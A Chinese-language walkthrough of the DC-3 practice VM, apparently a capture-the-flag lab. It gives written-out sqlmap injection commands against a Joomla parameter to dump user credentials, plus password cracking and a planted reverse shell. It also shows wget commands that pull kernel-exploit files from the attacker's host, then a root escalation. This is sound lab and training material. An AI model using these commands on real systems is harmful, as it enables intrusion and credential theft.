【DC系列03】DC-3靶机复盘

【DC系列03】DC-3靶机复盘

刚开始我的虚拟机导入靶机，打开时会出现这个错误，只需要添加一个硬盘就可以，选择IDE的。

然后我们扫描一下靶机ip地址

扫出来以后再单独扫描一下这个网站。

登陆这个ip以后指纹识别发现这个网站CMS是Joomla，我知道一个专门针对joomla的扫描工具，我们扫描一下。

我们扫描出两个重要内容，一个是joomla的版本，一个是他的登陆页面。

我们针对这个版本搜索一下他的漏洞，发现刚好有一个可以利用的，我们下载下来。

发现这是一个sql注入的漏洞，可以可以sqlmap这个工具实现sql注入，不懂的可以单独搜索一下sqlmap这个工具。

sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables  -p list[fullordering]

sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns  -p list[fullordering]

sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password,username" --dump  -p list[fullordering]

经过一系列操作我们成功拿到了一个账号密码，但是密码是密文的。

利用kali自带的john工具爆破一下密码，很快密码就出来了

尝试登陆了一下这个后台，发现成功登陆了上去。

在 这里面搜索了一圈，发现一个可以注入php代码的地方，经过尝试很轻易的就做了一个反弹shell。

这里面是有两个主页的模板，这里面有前端代码，可以自己新建php文件，也可以在原本php文件中插入代码。

我点进来以后在html文件下面找到了个php文件，然后插入了一段反弹shell。然后关闭这个页面，在最上面一行Close File。

点击预览，或者退出这个页面，重新点击这个模板。

kali这边就拿到了反弹shell。

用python美化一下命令行。

在这里面找了一圈并没有发现有什么可以利用的东西，就想到了内核漏洞，专门搜索了一下这个内核漏洞，发现这个系统的发行版本是16.06，内核版本是4.40。

搜索一下这个发行版本的漏洞，发现有合适的。

下载后cat一下，里面有一个提权代码的路径，我们wget一个这个zip，下载到我们本机上。

解压后发现两个文件，一个crasher.tar,一个exploit.tar，我们解压一下exploit.tar，解压出一个目录ebpf_mapfd_doubleput_exploit。

我们把ebpf_mapfd_doubleput_exploit里面的东西都拷贝到目标主机。

cd /tmp
wget 192.168.102.129/compile.sh
wget 192.168.102.129/doubleput.c
wget 192.168.102.129/hello.c
wget 192.168.102.129/suidhelper.c

然后我们运行./compil.sh。

运行完后出现一个doubleput文件，我们再运行一下./doubleput大概等1分钟就拿到root权限了。